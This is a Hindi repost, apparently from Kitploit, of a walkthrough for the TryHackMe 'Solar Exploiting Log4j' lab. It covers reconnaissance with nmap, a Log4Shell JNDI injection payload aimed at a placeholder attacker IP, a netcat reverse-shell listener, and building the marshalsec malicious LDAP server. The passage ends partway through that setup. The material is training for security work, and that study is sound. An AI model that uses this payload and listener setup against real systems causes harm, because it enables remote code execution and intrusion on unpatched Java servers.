हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!
solar-exploiting-log4j — यह रिपॉजिटरी TryHackMe पर *Solar Exploiting Log4j रूम* का विस्तृत वॉकथ्रू प्रदान करती है, जो गंभीर Log4Shell भेद्यता (CVE-2021-44228) के शोषण पर केंद्रित है। यह प्रोजेक्ट दर्शाता है कि कैसे हमलावर Java अनुप्रयोगों में असुरक्षित लॉगिंग तंत्र का लाभ उठाकर रिमोट कोड निष्पादन प्राप्त कर सकते हैं। | Kitploit
यह रिपॉजिटरी TryHackMe पर *Solar Exploiting Log4j रूम* का विस्तृत वॉकथ्रू प्रदान करती है, जो गंभीर Log4Shell भेद्यता (CVE-2021-44228) के शोषण पर केंद्रित है। यह प्रोजेक्ट दर्शाता है कि कैसे हमलावर Java अनुप्रयोगों में असुरक्षित लॉगिंग तंत्र का लाभ उठाकर रिमोट कोड निष्पादन प्राप्त कर सकते हैं।
साझा करें
🔥 Solar Exploiting Log4j - TryHackMe वॉकथ्रू
📌 रूम: Solar Exploiting Log4j
प्लेटफ़ॉर्म: TryHackMe
कठिनाई: मध्यम
विषय: Log4Shell (Log4j भेद्यता)
🧠 उद्देश्य
Log4j भेद्यता (CVE-2021-44228) का शोषण करके रिमोट कोड निष्पादन प्राप्त करें और फ़्लैग कैप्चर करें।
🛠️ उपयोग किए गए उपकरण
Nmap
Burp Suite
cURL
Netcat
Python HTTP Server
🌐 चरण 1: रिकॉनिसेंस
🔍 लक्ष्य स्कैन करें
root@kitploit:~
nmap -sC -sV <TARGET_IP>
📌 निष्कर्ष
खुले पोर्ट: 80 (HTTP), अन्य रूम पर निर्भर
वेब एप्लिकेशन Java-आधारित बैकएंड पर चल रहा है
🌐 चरण 2: वेब एन्यूमरेशन
ब्राउज़र में वेब ऐप पर जाएँ
इनपुट्स के साथ इंटरैक्ट करें (लॉगिन/खोज/हेडर फ़ील्ड)
Burp Suite का उपयोग करके रिक्वेस्ट कैप्चर करें
💥 चरण 3: Log4j भेद्यता की पहचान करें
Log4j भेद्यता JNDI इंजेक्शन की अनुमति देती है:
root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/a}
यदि इनपुट लॉग किया जाता है → भेद्यता मौजूद है।
⚙️ चरण 4: लिसनर सेट करें
Netcat प्रारंभ करें
root@kitploit:~
nc -lvnp 4444
दुर्भावनापूर्ण LDAP सर्वर प्रारंभ करें (उदाहरण)
root@kitploit:~
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package